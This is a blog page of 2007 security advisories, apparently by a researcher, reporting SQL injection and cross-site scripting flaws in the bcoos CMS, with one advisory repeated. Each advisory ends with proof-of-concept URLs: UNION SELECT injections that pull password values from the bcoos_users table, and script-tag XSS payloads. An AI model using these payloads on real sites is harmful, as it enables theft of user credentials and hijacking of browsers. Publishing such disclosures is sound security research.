########################################################
Bcoops adresses/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-adressesratefilephp-lid-variable.html
vendor notify:NO exploits available: YES
########################################################
bcoos is content-community management system written in PHP-MySQL.
bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the script not
properly sanitizing user-supplied input to the 'lid' variable,
and adresses/ratefile.php script.This may allow an attacker to
inject or manipulate SQL queries in the backend database.
#################
Versions:
#################
bcoops 1.0.10 =< vulnerable
#################
Solution:
#################
No solution at this time !!!
Try to edit the source code
or Try another product
#################
Timeline:
#################
Discovered:25-11-2007
vendor notify:--------
vendor response:-------
disclosure:30-11-2007
#################
SQL intections:
#################
http://localhost/bcoops/modules/adresses/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201
####################### €nd ##############################
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Bcoops SQL injection and Cross-site scripting
Wednesday, November 28, 2007
####################################################
Bcoops SQL injection and Cross-site scripting
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-sql-injection-and-cross-site.html
vendor notify:YES exploits available: YES
####################################################
bcoos is content-community management system written in PHP-MySQL.
bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the arcade/index.php
script not properly sanitizing user-supplied input to the 'gid'
variable,and myalbum/ratephoto.php script and 'lid' variable are
afected by the same flaw This may allow an attacker to inject or
manipulate SQL queries in the backend database.
bccops contains too a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate the
'day' and 'year' variable upon submission to modules/theecal/display.php
script. This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to
a loss of integrity
#################
Versions:
#################
bcoops 1.0.10 =< vulnerable
#################
Solution:
#################
No solution at this time !!!
#################
Timeline:
#################
Discovered:25-11-2007
vendor notify:27-11-2007
vendor response:-------
disclosure:28-11-2007
#################
SQL intections:
#################
http://localhost/modules/arcade/index.php?act=show_stats
&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201
http://localhost/modules/myalbum/ratephoto.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201
http://localhost/modules/mylinks/ratelink.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201
#####################
Cross-site Scripting
#####################
http://localhost/modules/ecal/display.php?
day=17&month=11&year=2007"><script>alert()</script>
http://localhost/modules/ecal/display.php?
day=1"><script>alert()</script>&month=11&year=2007
####################### €nd ############################
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Bcoops SQL injection and Cross-site scripting
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-sql-injection-and-cross-site.html
vendor notify:YES exploits available: YES
####################################################
bcoos is content-community management system written in PHP-MySQL.
bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the arcade/index.php
script not properly sanitizing user-supplied input to the 'gid'
variable,and myalbum/ratephoto.php script and 'lid' variable are
afected by the same flaw This may allow an attacker to inject or
manipulate SQL queries in the backend database.
bccops contains too a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate the
'day' and 'year' variable upon submission to modules/theecal/display.php
script. This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to
a loss of integrity
#################
Versions:
#################
bcoops 1.0.10 =< vulnerable
#################
Solution:
#################
No solution at this time !!!
#################
Timeline:
#################
Discovered:25-11-2007
vendor notify:27-11-2007
vendor response:-------
disclosure:28-11-2007
#################
SQL intections:
#################
http://localhost/modules/arcade/index.php?act=show_stats
&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201
http://localhost/modules/myalbum/ratephoto.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201
http://localhost/modules/mylinks/ratelink.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201
#####################
Cross-site Scripting
#####################
http://localhost/modules/ecal/display.php?
day=17&month=11&year=2007"><script>alert()</script>
http://localhost/modules/ecal/display.php?
day=1"><script>alert()</script>&month=11&year=2007
####################### €nd ############################
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)